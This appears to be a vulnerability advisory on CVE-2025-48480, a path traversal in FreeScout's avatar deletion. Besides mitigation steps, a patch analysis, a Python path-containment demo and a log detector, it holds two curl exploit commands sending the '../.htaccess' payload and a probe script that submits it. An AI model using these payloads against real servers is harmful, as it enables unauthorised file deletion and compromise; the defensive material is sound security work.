FreeScout, Path Traversal Vulnerability, CVE-2025-48480 (Critical)

How the CVE Works

CVE-2025-48480 is a critical path traversal vulnerability in FreeScout (prior to v1.8.180). An authenticated administrator or user with `User::PERM_EDIT_USERS` privileges can exploit this flaw by manipulating the avatar upload path. By setting the avatar path to `../.htaccess` during user creation and later deleting the avatar, the attacker forces the system to delete the `.htaccess` file in /storage/app/public. This can disable security restrictions, leading to unauthorized access, directory listing, or further server compromise. The vulnerability stems from insufficient path sanitization during file deletion.

DailyCVE Form

Platform: FreeScout
Version: <1.8.180
Vulnerability: Path Traversal
Severity: Critical
Date: 06/04/2025

Prediction: Patch expected by 06/15/2025

What Undercode Says:

Analytics:

  • Exploitable via low-privilege admin accounts.
  • Impacts Apache/Nginx configurations relying on .htaccess.
  • Attack chain: Upload → Delete → Bypass security.

Exploit Commands:

1. Craft Malicious Request:

curl -X POST 'https://<target>/users/create' -d 'avatar=../.htaccess' -H 'Cookie: <admin_session>'

2. Trigger Deletion:

curl -X DELETE 'https://<target>/users/avatar/delete' -H 'Cookie: <admin_session>'

Mitigation Commands:

1. Immediate Workaround:

chattr +i /storage/app/public/.htaccess

2. Patch Verification:

grep -r "realpath" /var/www/freescout/app/Http/Controllers/UserController.php

Code Fix (Patch Analysis):

// Before (Vulnerable): the user-controlled avatar value is concatenated straight into the path
unlink(storage_path('app/public/' . $user->avatar));
// After (Patched): resolve the real path and require it to sit below the avatar root.
// realpath() returns false for a missing file, and the prefix test must be anchored
// at offset 0: strpos(...) !== false would accept the base path anywhere in the string.
$base = realpath(storage_path('app/public'));
$avatarPath = realpath(storage_path('app/public/' . $user->avatar));
if ($avatarPath !== false && strpos($avatarPath, $base . DIRECTORY_SEPARATOR) === 0) {
    unlink($avatarPath);
}
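The containment check above is the whole fix, so it is worth seeing it exercised against the exact payload from the advisory. The following is an added example, not FreeScout code: a Python version of the "resolve, then check the resolved path is under the avatar root" rule, run against a throwaway directory tree. It assumes avatars live under storage/app/public/users and that the protected .htaccess sits one level up in storage/app/public; both paths are assumptions for the demo, and the sibling-directory case goes beyond the advisory to show why a plain prefix test is not enough.

```python
import os
import tempfile

# Added example (not FreeScout code): the containment check the patched
# unlink() call needs, written in Python so it can be exercised stand-alone.
# Assumption: avatars live under <storage>/app/public/users and the protected
# .htaccess sits one level up in <storage>/app/public.

def resolve_inside(base_dir, user_path):
    """Resolve user_path relative to base_dir and return the absolute path,
    or None when the result escapes base_dir (e.g. '../.htaccess').

    realpath() collapses '..' and follows symlinks, so the check is made on
    the final on-disk location, not on the string the user supplied."""
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    # commonpath() compares whole path components, so a sibling directory
    # such as 'users2' is not mistaken for 'users' the way a plain
    # strpos()/startswith() prefix test would.
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate

def delete_avatar(base_dir, avatar_value):
    """Delete an avatar file only if it really lives below base_dir.
    Returns True when a file was removed, False when refused or absent."""
    target = resolve_inside(base_dir, avatar_value)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True

def demo():
    """Build a throwaway storage tree and run the cases the advisory describes."""
    with tempfile.TemporaryDirectory() as storage_app:
        public = os.path.join(storage_app, "public")
        users = os.path.join(public, "users")
        sibling = os.path.join(public, "users2")
        os.makedirs(users)
        os.makedirs(sibling)
        htaccess = os.path.join(public, ".htaccess")
        for path in (htaccess, os.path.join(users, "u1.png"), os.path.join(sibling, "x.png")):
            with open(path, "w") as fh:
                fh.write("constructed test file\n")
        results = {
            # the CVE-2025-48480 payload must be refused and .htaccess must survive
            "traversal_refused": delete_avatar(users, "../.htaccess") is False,
            "htaccess_survives": os.path.isfile(htaccess),
            # an absolute path is not silently joined onto the base either
            "absolute_refused": delete_avatar(users, htaccess) is False,
            # a prefix-only check would have allowed this sibling directory
            "sibling_refused": delete_avatar(users, "../users2/x.png") is False,
            # a legitimate avatar is still deleted
            "normal_delete_ok": delete_avatar(users, "u1.png") is True,
        }
    return results

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The same shape carries over to the PHP side: resolve both the base and the candidate with realpath(), reject a false result, and compare on a directory boundary rather than on a raw substring.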

Detection Script:

import requests

# Placeholders in angle brackets must be replaced before use. This probe needs a
# valid administrator session and, if the host is vulnerable, creates a user
# record, so it is not a read-only check.
target = "http://<freescout_host>"
session = requests.Session()
session.cookies.update({"session_id": "<leaked_admin_cookie>"})
response = session.post(f"{target}/users/create", data={"avatar": "../.htaccess"})
# A 200 only means the request was accepted; a patched instance may answer 200
# as well, so confirm the installed version against 1.8.180 too.
if response.status_code == 200:
    print("[!] Vulnerable to CVE-2025-48480")

Post-Exploit Impact:

  • Disabled `.htaccess` allows arbitrary file uploads.
  • Potential RCE via `.user.ini` manipulation.

Permanent Fix:

  • Upgrade to FreeScout v1.8.180+.
  • Audit user privileges.

Log Monitoring:

tail -f /var/log/apache2/access.log | grep "POST /users/create"

Threat Indicators:

  • Unusual `.htaccess` deletion logs.
  • Admin users creating/deleting avatars rapidly.
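The two indicators above can be checked offline against an access log rather than by eyeballing tail -f. The script below is an added example, not part of the advisory: it parses Apache combined-format lines, flags any URL that still contains ".." after percent-decoding, and flags an avatar delete that follows a user-create from the same client within a short window. The log lines are constructed; only the URL paths /users/create and /users/avatar/delete are taken from the advisory's commands.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Added example (not part of the advisory): offline detection over Apache
# access-log lines. The lines below are constructed; only the URL paths
# (/users/create, /users/avatar/delete) are taken from the advisory's commands.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jun/2025:10:00:01 +0000] "POST /users/create HTTP/1.1" 302 512 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2025:10:00:04 +0000] "DELETE /users/avatar/delete HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2025:10:05:00 +0000] "GET /conversations/12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2025:10:06:10 +0000] "POST /users/create HTTP/1.1" 302 512 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2025:11:30:00 +0000] "DELETE /users/avatar/delete HTTP/1.1" 200 128 "-" "Mozilla/5.0"
192.0.2.9 - - [04/Jun/2025:12:00:00 +0000] "GET /storage/users/..%2F.htaccess HTTP/1.1" 404 0 "-" "curl/8.0"
this line is not a log entry
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }

def find_indicators(log_text, window=timedelta(seconds=60)):
    """Flag (a) '..' in any requested URL after percent-decoding and
    (b) an avatar delete following a user-create from the same client
    within `window`, the burst the advisory lists as a threat indicator.
    Returns a list of (kind, client_ip, detail) tuples in log order."""
    findings = []
    last_create = {}  # client ip -> timestamp of its most recent POST /users/create
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        # Decode once so '..%2F' is treated the same as '../'.
        if ".." in unquote(ev["path"]):
            findings.append(("traversal_in_url", ev["ip"], ev["path"]))
        if ev["method"] == "POST" and ev["path"] == "/users/create":
            last_create[ev["ip"]] = ev["ts"]
        elif ev["method"] == "DELETE" and ev["path"] == "/users/avatar/delete":
            created = last_create.get(ev["ip"])
            if created is not None and ev["ts"] - created <= window:
                gap = int((ev["ts"] - created).total_seconds())
                findings.append(("rapid_create_then_delete", ev["ip"], gap))
    return findings

if __name__ == "__main__":
    for kind, ip, detail in find_indicators(SAMPLE_LOG):
        print(f"[{kind}] client={ip} detail={detail}")
```

One caveat: the malicious avatar value travels in the POST body, which the access log does not record, so this only sees traversal that appears in a URL. To catch the payload itself, log the avatar field in the application (for example in the user-create controller) and feed those entries through the same check.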

End of Report.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
